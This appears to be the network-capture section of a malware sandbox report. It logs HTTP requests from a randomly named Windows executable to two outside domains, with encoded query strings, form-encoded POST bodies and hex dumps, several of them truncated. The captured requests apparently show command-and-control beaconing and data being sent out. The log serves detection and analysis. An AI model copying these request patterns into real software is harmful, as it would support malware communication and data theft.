                                                      Data Ascii: OdjTHtuX=1pgFM2Bg2oSjKDIRH60r3sn9IwidBS2djvZDylgUeN9PZgTZ5ev5Uh6QqwR12bDMy8BpOT3uVdJZkFQbr/F/eSEPM3ggl7XV/E6NjPcK2zEsSX35kLYOM9Tm49EYQAwqEKdXSmqlZyH3T0fzPC4VbeHsnbv9MeuuX0AReBRBKG59WMZ1gyOR7+4G4ClfCC8hzJKNp8V2NuAm74hYVOUb7gGCiudfv0eqlLhj+yBNeI7DE1g7PgU2UEBafo8KXONwZ5ytzt3CoCAWo6L0/PPBBB9qTKG0jiwdWn+5D9ajQ1SzrnFvBjyhV+V1Z/ENFL3bo3D0fP95n/H+RwsKXFFdl1WRPxv+5J/RsNv4GSSkl2Y7nfYVGqWLqjxOGpZfwuTqJcGR11jxm86WjWsSDZPwH6cV0nLGpY6fywPW7Dc4rUaARJTIhKdakYK6JNXC7ud+i4TF9Mgx0C51ZSsj1+1F3104mmZKqiOL4koEImQ9QzI4VSZ3mQLAjdSWekechaEthUdSosBvi4iG8QKZ0QG6IkYDegs2Nj9Uxh83+PgUP9DtO2sVZ07B+grO4lIyMrMM2STAb04srcs9rlY3vegBIsQkSqQGP8vDpePd+tzYf07VtnCyzdfsHSpTTsoDb83Of5S2J6z/2iTi2qEDMyHyk6N8lof4W6QYZIq8wEyeKu/0uxFBoRDaYoXLbmRS8cE/zR0F6UghXW/dLzzPH0xnGdqtnew9I5Gw/jZ3OP2idxfNul5D3lNsNaxoiUyvZ6lCrMhqEbWE+KOTJAjMQZ8mIe2ch2GWPKTG/AG3eiXBVv4phk9Oo/06AoN7FHT+kHL7boOSH0jf51VnjQ5bcwxpJRljDvSrAcPMZ4WN4CR7pzhos7Fwc+QmwR2+E+kf2yUJJkpFsi1Mr2BOR1YFXWR3p7WfnaqwIurL9NihjCpg/bMFHxeKRA2JTugXK8l9KbidC5TaW/cJlh5cBg4GIo9tSvEEA5ZgbaI9Qf+kQNZoSOS [TRUNCATED]
                                                      Jul 3, 2024 17:58:05.768886089 CEST1236INHTTP/1.1 404 Not Found
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:58:05 GMT
                                                      Server: Apache
                                                      X-Powered-By: PHP/8.2.20
                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                      Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"
                                                      Content-Encoding: gzip
                                                      Data Raw: 35 34 30 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed bd 5b 97 db 46 b2 2e f8 2c ff 0a 98 5a 2d 57 6d 13 e0 9d ac 2a a9 d4 23 cb 72 6f cf b1 2c 1f 4b ee 9e 3d 96 17 17 48 82 55 90 48 82 0d 90 75 b1 5a 3f e6 3c 9e 87 f3 b0 d7 79 9b c7 f1 1f 9b 2f 22 32 13 09 30 41 b2 2e b2 bd d7 1a 5d aa 48 20 2f 91 91 91 71 cb c8 c8 27 9f 4f 92 f1 ea 7a 19 79 e7 ab f9 ec e9 67 4f e8 97 37 0b 17 67 a7 b5 68 e1 ff f4 ba 46 cf a2 70 f2 f4 b3 07 4f e6 d1 2a f4 c6 e7 61 9a 45 ab d3 da 4f 6f be f1 8f f0 fa 81 7a b1 08 e7 d1 69 ed 22 8e 2e 97 49 ba aa 79 e3 64 b1 8a 16 28 78 19 4f 56 e7 a7 93 e8 22 1e 47 3e 7f a9 7b f1 22 5e c5 e1 cc cf c6 e1 2c 3a 6d 51 33 4f 66 f1 e2 bd 97 46 b3 d3 da 32 4d a6 f1 2c aa 79 e7 69 34 3d ad 9d af 56 cb 93 46 e3 6c be 3c 0b 92 f4 ac 71 35 5d 34 5a 52 67 15 af 66 d1 d3 1f c2 b3 c8 5b 24 2b 6f 9a ac 17 13 ef d1 c3 a3 76 ab f5 d8 7b 96 8e cf e3 55 34 5e 61 1c 4f 1a 52 f4 33 19 05 03 fb 45 9a 8c 92 55 f6 85 01 f5 8b 45 12 2f 26 d1 55 1d 8d 4d 93 d9 2c b9 fc c2 6b 00 01 06 b2 2f 26 8b cc 5f 02 a8 68 [TRUNCATED]
                                                      Data Ascii: 5402[F.,Z-Wm*#ro,K=HUHuZ?<y/"20A.]H /q'OzygO7ghFpO*aEOozi".Iyd(xOV"G>{"^,:mQ3OfF2M,yi4=VFl<q5]4ZRgf[$+ov{U4^aOR3EUE/&UM,k/&_h5>BX(.yd_:YQVQW@Mi-\.g8\fW^NkPGiu&&%%,'nLQQ+x bxRXXEW"yO><g2^.y.~V,NQE?UvDVotm4zonoQdgk5~!5qT;Pl3^=oK?^gW";](=W1<<Zq~UE(EBbLdw.KY=z{*wzILMV|yr.apYeh*I1AR?_>V)/^?%sG}hXHj#A{v(>;_=F={=Xx1n
                                                      Jul 3, 2024 17:58:05.768913031 CEST224INData Raw: 75 4a 50 fe 14 2f 56 9d f6 b3 34 0d af 0f a2 e0 0c 30 11 79 00 f6 70 9f a6 83 09 0a 1e d6 d3 53 d4 bd 35 4c 0b 86 a9 7e 5f d0 1c 3e 4e a3 d5 3a 5d 78 ab 20 02 11 5c 1f 68 04 12 fa 0e 3f a8 97 d1 e9 e9 69 fa f3 ea 97 8f 87 39 82 d7 1a c1 d9 65 4c
                                                      Data Ascii: uJP/V40ypS5L~_>N:]x \h?i9eLG1(6gUqBQgiz5ofsp O@Fbuy44u'B_hD@=*51vQbmg}VU[tTzJOi>|S5
                                                      Jul 3, 2024 17:58:05.768925905 CEST1236INData Raw: 52 82 39 9a b6 f0 53 cf 07 21 97 67 02 4f e4 2d 8d 57 bf 35 63 a9 aa 28 68 75 55 3c fc a8 7a 6f e5 14 33 d5 14 43 0b 2a 3d ad 41 2e 47 d3 78 01 81 f4 f9 29 89 b3 64 ea fd 23 49 df 47 e9 df 66 c9 28 9c bd 1e 27 cb e8 d1 a3 2c 9a 4d a1 1b 80 57 2c
                                                      Data Ascii: R9S!gO-W5c(huU<zo3C*=A.Gx)d#IGf(',MW,"j:s^f5O\^""5Yzx~N:{=?\b4g'7?0r_!!_WV)i/`@ACCI!H?$?Gz&ExZ+pWA
                                                      Jul 3, 2024 17:58:05.768969059 CEST1236INData Raw: 64 dc 4b 98 13 60 82 50 a0 4e 85 07 68 76 51 66 11 01 38 51 30 0f 97 22 87 14 7b cc d9 cd 78 16 c2 a1 33 f6 a1 f0 cc 23 61 27 3b 64 d1 1e 5e 28 f7 88 3e 8c 93 59 92 9e 3c 9c 4e a7 8f 73 16 0f de c6 4f 3b ed ce a0 33 7e 2c c2 ca 07 97 8b d7 d9 c9
                                                      Data Ascii: dK`PNhvQf8Q0"{x3#a';d^(>Y<NsO;3~,1,)bI2?vC-#>/=~?jN<{LF'E9_|A=yD9zdr/X!OMYf|.Ppg>ht4_e0-43&p7z:
                                                      Jul 3, 2024 17:58:05.768985033 CEST1236INData Raw: 6d ce 21 87 65 de dc 35 41 a6 ff a6 96 00 b9 61 36 20 20 7e 90 43 40 df dc 65 ca ed 68 ee 63 3c a2 30 e4 d7 f3 45 56 60 24 86 1d 31 2f d8 a3 8a c5 9d dc 55 68 e3 cd c7 a8 e1 a3 5f 45 ee be 5a 10 5d 36 ef 33 10 56 d5 b5 3a d5 75 83 f3 30 13 07 81
                                                      Data Ascii: m!e5Aa6 ~C@ehc<0EV`$1/Uh_EZ]63V:u0x=3;gsjgs\E)hKdg{e;2R v>U\CR5G-p#-1{[hUD9SRvQR";OZ-?m9AM;*nDR$#
                                                      Jul 3, 2024 17:58:05.769282103 CEST672INData Raw: b5 0c 17 9a db 6c c1 56 45 5b 5b d7 5b b1 8e 47 59 3c 58 81 41 64 f7 32 41 0e 94 6d 78 28 d4 65 48 f3 da cb d9 35 50 51 f8 ce ac 6f 27 42 0a 83 b5 68 cc a4 31 11 d6 ad f4 2a c5 b3 ed 6d 62 f0 20 66 df 2e b1 01 ea 2e 00 1d 8c ae 49 fd 42 94 ca 79
                                                      Data Ascii: lVE[[[GY<XAd2Amx(eH5PQo'Bh1*mb f..IBy>4JV M=\r#mwo- )!f)A!Quo#"EZspU!"xV]Y!4M^A@QVRM-,4z$U9y_Hf5g;@/:)
                                                      Jul 3, 2024 17:58:05.769375086 CEST1236INData Raw: e4 ca a6 22 85 3b cc 11 73 cb fd 17 6b 3e 59 1c 11 ac 7d 54 1b a3 55 12 70 a7 0d 83 03 a9 29 ce ef ae c7 63 f8 4c 78 95 c8 13 5a 83 44 a7 37 30 6b a5 22 0e af 2d e0 cf e1 a6 04 aa bd 75 97 2d 13 b3 a9 53 10 70 a2 1e cb 92 11 2b 8b 43 3a 6e b0 4c
                                                      Data Ascii: ";sk>Y}TUp)cLxZD70k"-u-Sp+C:nL-wO8a8>j8R:$`8W2KZHB]{C92['7dy@Hk}_cSaSUeBH2-i:0HtHZ`_F;;
                                                      Jul 3, 2024 17:58:05.769618034 CEST1236INData Raw: b5 93 fb 18 be 05 5c d9 97 2c 4e 10 80 8c 03 28 ab e8 7e 48 8a 99 85 9a c9 7b 12 04 bb 67 ee f7 a1 4f 35 55 bf 6b 67 f7 25 4c 77 e3 f0 ee 3d 21 88 c6 27 03 ac a0 d5 ea 87 86 1b 87 bb 45 87 ad 15 4f 28 9a 03 37 1b e2 38 57 a1 dd db 5b 12 7f 4c ff
                                                      Data Ascii: \,N(~H{gO5Ukg%Lw=!'EO(78W[Ln-W$H#EcRvC>C}R23lAiuQ`r?!ULj#5LZ)O&SxIb!^aB9eJIN~O%N)p56\3:
                                                      Jul 3, 2024 17:58:05.769634008 CEST1236INData Raw: 75 57 2a 5d ab 9e e0 2e 21 6e b3 23 e5 fd c1 6d 25 f6 80 c2 13 95 03 64 e3 39 5b fa 7b 41 d7 1d f4 8f 47 1d 57 9f 5e 4c 0d 68 54 f0 fd 14 27 de 91 82 0f 33 f9 1c c9 4a e3 c4 a3 1c 3e 58 3c 88 da c0 7a c1 6c c8 8e 38 4f 69 30 46 e2 1c 4e 3d 42 27
                                                      Data Ascii: uW*].!n#m%d9[{AGW^LhT'3J>X<zl8Oi0FN=B')q}o3:*EU`];:VDmqokg?>W/_fxu$^FD&1!rL}~.9F:\.8Mh\q_XCU
                                                      Jul 3, 2024 17:58:05.769649029 CEST1236INData Raw: 6e a3 2b 98 a9 4b e2 4e d6 4b 9a 78 d4 d2 2f 09 19 9b 56 30 e8 e7 d9 3b f8 ef 88 93 d0 e5 c1 2c b7 2c 56 92 83 06 67 1e 43 c6 82 d7 ea 46 c1 e0 ad 26 76 e7 1a 32 d2 d6 71 c4 17 fb 0e 38 63 61 72 7b 02 14 23 99 c8 73 63 af 6a 45 04 02 14 c9 65 46
                                                      Data Ascii: n+KNKx/V0;,,VgCF&v2q8car{#scjEeF@"Ti74CYhSz@neft6AV-=EFsx#>TNT|K-eiRxAo/|6l;Ztg&\tG(-6Y{+K6>;RA;zn/fV8
                                                      Jul 3, 2024 17:58:05.773835897 CEST1236INData Raw: 23 86 03 48 5d 37 65 e3 41 9e d2 e5 50 85 a7 f9 25 01 16 ce 86 12 6e b2 5e a9 1c d6 99 da 5d d2 17 0a 48 92 77 71 33 fd 62 37 57 ae 28 f5 a4 b8 a4 84 2f 14 f7 42 c7 55 58 75 cf 4a 76 4d dc 76 b8 4a 54 52 4b 8a 21 b0 5e d2 b5 61 88 35 8d 2e f8 0e
                                                      Data Ascii: #H]7eAP%n^]Hwq3b7W(/BUXuJvMvJTRK!^a5..3S^bm!Lacc[0#ibsstk1*"=}cP68"b)ao*F@4@u$Xw6zZ!/+.cKAi1@$ElI


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      24192.168.2.649752217.160.0.84806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:58:07.119601965 CEST355OUTGET /s24g/?Y6vp=3PLd8j&OdjTHtuX=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM= HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.architect-usschool.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:58:07.989995003 CEST505INHTTP/1.1 301 Moved Permanently
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:58:07 GMT
                                                      Server: Apache
                                                      X-Powered-By: PHP/8.2.20
                                                      Expires: Wed, 03 Jul 2024 16:58:07 GMT
                                                      Cache-Control: max-age=3600
                                                      X-Redirect-By: WordPress
                                                      Location: http://architect-usschool.com/s24g/?Y6vp=3PLd8j&OdjTHtuX=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM=
                                                      Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      25192.168.2.64975491.195.240.19806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:58:13.072691917 CEST614OUTPOST /3jr0/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 213
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.easybackpage.net
                                                      Origin: http://www.easybackpage.net
                                                      Referer: http://www.easybackpage.net/3jr0/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 50 34 50 37 4f 42 70 4c 62 35 6d 6b 30 39 41 67 4f 71 4e 57 56 35 79 46 56 6b 47 33 77 69 77 36 64 43 2f 59 33 39 63 62 5a 35 52 76 41 55 6b 4a 32 52 69 76 6b 72 42 4f 6a 66 4e 50 70 4f 46 53 6c 69 31 33 66 38 72 4a 56 47 55 34 53 74 7a 78 5a 54 33 42 71 62 7a 53 45 34 36 61 68 32 6b 6d 73 4a 71 6e 32 48 75 41 6e 2b 41 4e 77 49 6a 4f 56 6d 67 55 61 53 78 2f 31 51 41 44 4c 63 71 71 66 38 45 5a 6a 48 50 45 5a 38 6c 49 78 62 47 4c 4a 5a 54 4c 37 64 5a 54 50 4e 44 62 35 46 64 4d 70 38 62 54 76 31 63 47 42 6a 52 4f 4c 56 6d 4a 77 46 37 65 62 38 76 76 57 53 76 51 34 6c 62 31 49 4a 37 69 43 52 52 62 35 49 6e 39
                                                      Data Ascii: OdjTHtuX=P4P7OBpLb5mk09AgOqNWV5yFVkG3wiw6dC/Y39cbZ5RvAUkJ2RivkrBOjfNPpOFSli13f8rJVGU4StzxZT3BqbzSE46ah2kmsJqn2HuAn+ANwIjOVmgUaSx/1QADLcqqf8EZjHPEZ8lIxbGLJZTL7dZTPNDb5FdMp8bTv1cGBjROLVmJwF7eb8vvWSvQ4lb1IJ7iCRRb5In9
                                                      Jul 3, 2024 17:58:13.707123041 CEST305INHTTP/1.1 405 Not Allowed
                                                      date: Wed, 03 Jul 2024 15:58:13 GMT
                                                      content-type: text/html
                                                      content-length: 154
                                                      server: Parking/1.0
                                                      connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      26192.168.2.64975591.195.240.19806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:58:15.607995033 CEST638OUTPOST /3jr0/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 237
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.easybackpage.net
                                                      Origin: http://www.easybackpage.net
                                                      Referer: http://www.easybackpage.net/3jr0/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 50 34 50 37 4f 42 70 4c 62 35 6d 6b 31 5a 38 67 4e 4e 52 57 54 5a 79 61 57 6b 47 33 69 69 77 2b 64 44 44 59 33 38 59 4c 4d 66 42 76 41 78 67 4a 33 51 69 76 6e 72 42 4f 37 76 4e 4b 74 4f 46 62 6c 69 35 4a 66 35 54 4a 56 47 41 34 53 6f 50 78 5a 68 66 43 72 4c 7a 48 66 49 36 63 2f 47 6b 6d 73 4a 71 6e 32 48 36 6d 6e 2b 49 4e 78 34 7a 4f 61 6e 67 58 55 79 78 67 2f 77 41 44 42 4d 71 75 66 38 46 2b 6a 47 6a 2b 5a 35 68 49 78 66 43 4c 4a 73 2f 4d 78 64 5a 64 42 74 43 71 78 51 45 56 74 2f 32 33 70 33 45 2f 43 68 5a 2f 48 44 6e 54 73 32 37 39 4a 73 50 74 57 51 33 69 34 46 62 66 4b 4a 44 69 51 47 64 38 32 38 43 65 75 75 70 33 4d 30 67 34 74 35 74 5a 72 39 5a 4b 49 4c 51 58 70 67 3d 3d
                                                      Data Ascii: OdjTHtuX=P4P7OBpLb5mk1Z8gNNRWTZyaWkG3iiw+dDDY38YLMfBvAxgJ3QivnrBO7vNKtOFbli5Jf5TJVGA4SoPxZhfCrLzHfI6c/GkmsJqn2H6mn+INx4zOangXUyxg/wADBMquf8F+jGj+Z5hIxfCLJs/MxdZdBtCqxQEVt/23p3E/ChZ/HDnTs279JsPtWQ3i4FbfKJDiQGd828Ceuup3M0g4t5tZr9ZKILQXpg==
                                                      Jul 3, 2024 17:58:16.257267952 CEST305INHTTP/1.1 405 Not Allowed
                                                      date: Wed, 03 Jul 2024 15:58:16 GMT
                                                      content-type: text/html
                                                      content-length: 154
                                                      server: Parking/1.0
                                                      connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      27192.168.2.64975691.195.240.19806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:58:18.133800030 CEST1651OUTPOST /3jr0/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1249
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.easybackpage.net
                                                      Origin: http://www.easybackpage.net
                                                      Referer: http://www.easybackpage.net/3jr0/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 50 34 50 37 4f 42 70 4c 62 35 6d 6b 31 5a 38 67 4e 4e 52 57 54 5a 79 61 57 6b 47 33 69 69 77 2b 64 44 44 59 33 38 59 4c 4d 66 4a 76 41 6a 6f 4a 32 7a 61 76 6d 72 42 4f 32 50 4e 4c 74 4f 45 5a 6c 69 51 4f 66 35 76 7a 56 45 34 34 52 4f 37 78 49 6c 4c 43 6c 4c 7a 48 58 6f 36 64 68 32 6b 4a 73 4a 37 73 32 48 71 6d 6e 2b 49 4e 78 39 33 4f 64 32 67 58 5a 53 78 2f 31 51 41 78 4c 63 71 53 66 38 74 45 6a 47 58 75 5a 4b 5a 49 77 37 6d 4c 50 4f 6e 4d 73 4e 59 37 47 74 43 79 78 51 41 77 74 2f 71 56 70 32 77 56 43 68 74 2f 46 45 69 56 78 56 4c 34 65 62 6e 52 57 67 6e 34 35 56 66 57 43 4c 44 6a 57 48 67 50 31 64 47 73 32 4c 74 79 43 6b 56 2f 6b 61 70 51 6f 4a 4e 45 43 49 6c 46 70 70 58 55 45 4e 48 72 49 6d 35 61 45 42 71 62 53 2f 75 70 77 41 57 52 74 5a 2b 37 73 57 6b 4e 6f 47 75 4a 6c 7a 78 67 43 67 65 57 2b 73 61 52 55 65 52 69 37 72 2b 74 48 6e 34 79 4a 7a 54 63 76 47 5a 6b 4f 70 77 74 45 44 6b 59 38 67 39 77 6e 72 47 5a 4d 41 41 41 52 31 48 6c 31 34 4c 32 50 70 77 6f 73 52 66 41 4e [TRUNCATED]
                                                      Data Ascii: OdjTHtuX=P4P7OBpLb5mk1Z8gNNRWTZyaWkG3iiw+dDDY38YLMfJvAjoJ2zavmrBO2PNLtOEZliQOf5vzVE44RO7xIlLClLzHXo6dh2kJsJ7s2Hqmn+INx93Od2gXZSx/1QAxLcqSf8tEjGXuZKZIw7mLPOnMsNY7GtCyxQAwt/qVp2wVCht/FEiVxVL4ebnRWgn45VfWCLDjWHgP1dGs2LtyCkV/kapQoJNECIlFppXUENHrIm5aEBqbS/upwAWRtZ+7sWkNoGuJlzxgCgeW+saRUeRi7r+tHn4yJzTcvGZkOpwtEDkY8g9wnrGZMAAAR1Hl14L2PpwosRfANQk6ZrPpaLsRhQo/FNUV3GzLRTWCYvpuI6Bif0YrwRDI1Nyov9KFBqFwDfChwZA9toOtttHtLQY/PAJCD1MbiNxAR4tkAsrCneoyDAtlPInYSKxmsbneRGZ8WW/lmPV+UMRX/7n6w3xYcWgGrXOIQwz8qaTtZ1O3RF1MjwN5kpngUHrOxeaOh0H8FnwraaHu2GydQm/2LRNxZHg3uLzL1Fo1nYo/K0gXlQ3ehytyguIFEoljkPLgIuEcKfNUjnHO6bbyip9ZW/O7EYmSk/Y1X+UVcluHAppiY5bgfsXzORoGcgk8ofcgLzgqw/X7LJhPr8Q87nL6sFthGLWukAGudN1ktkpVFsUG2zSJNRIN8mSucnY9mvgIZWWIFBovnmRP7cgzqiClmiANjQbQwYs5diHDb0cFb3LWoxgQ04XMSwTUNQqYeI45AXETAtCTGyW0r9k3roCD9U5QRDkg9T67BElQh4n+Z/p/gJirlQM4drBz9UbuhKDFHN1HnqIFgyoth7zpFoOV8j/CVAwEzMs3RdB/RZTqJtuYEFD4npeDQspIbjuWVO558KTzbWhWSP9pntgULFJrUMMvhNQlKjDZ1blhU4T2kdpDtVSHWrAR56dcWIngUHJ5DySWNT0OKDAtgi+50e8Az4hD3K1HJe1Bbw2S6vGz0Ij+Ce2 [TRUNCATED]
                                                      Jul 3, 2024 17:58:18.794671059 CEST305INHTTP/1.1 405 Not Allowed
                                                      date: Wed, 03 Jul 2024 15:58:18 GMT
                                                      content-type: text/html
                                                      content-length: 154
                                                      server: Parking/1.0
                                                      connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      28192.168.2.64975791.195.240.19806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:58:20.681797028 CEST349OUTGET /3jr0/?OdjTHtuX=C6nbN3Z6SrmD48dKFL5Pdr+cZFmYp1QsQ3e628IyGZcRZCB2vhKb6ox4g6I37OYbmAVSFMbRXnVDWcusSAPk0vfQfIagm0ASlZK02lSA38wn9PDfH1oUKWJrxTMbBcOAU+1qziI=&Y6vp=3PLd8j HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.easybackpage.net
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:58:21.382949114 CEST1236INHTTP/1.1 200 OK
                                                      date: Wed, 03 Jul 2024 15:58:21 GMT
                                                      content-type: text/html; charset=UTF-8
                                                      transfer-encoding: chunked
                                                      vary: Accept-Encoding
                                                      expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                      cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      pragma: no-cache
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_rRjJIWQ2eGKqDJ4VFZEGEqIfhEaBn/P9OrURBY8NQjXfYaXIJQfAAF0i/V+hMwvpLYKngQamCJviQX0o42IS+A==
                                                      last-modified: Wed, 03 Jul 2024 15:58:21 GMT
                                                      x-cache-miss-from: parking-89c5695ff-gj6gm
                                                      server: Parking/1.0
                                                      connection: close
                                                      Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 72 52 6a 4a 49 57 51 32 65 47 4b 71 44 4a 34 56 46 5a 45 47 45 71 49 66 68 45 61 42 6e 2f 50 39 4f 72 55 52 42 59 38 4e 51 6a 58 66 59 61 58 49 4a 51 66 41 41 46 30 69 2f 56 2b 68 4d 77 76 70 4c 59 4b 6e 67 51 61 6d 43 4a 76 69 51 58 30 6f 34 32 49 53 2b 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 65 61 73 79 62 61 63 6b 70 61 67 65 2e 6e 65 74 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 65 61 73 [TRUNCATED]
